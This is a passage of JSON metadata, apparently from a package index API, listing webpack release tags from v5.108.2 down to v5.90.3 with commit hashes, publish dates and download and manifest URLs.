08.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/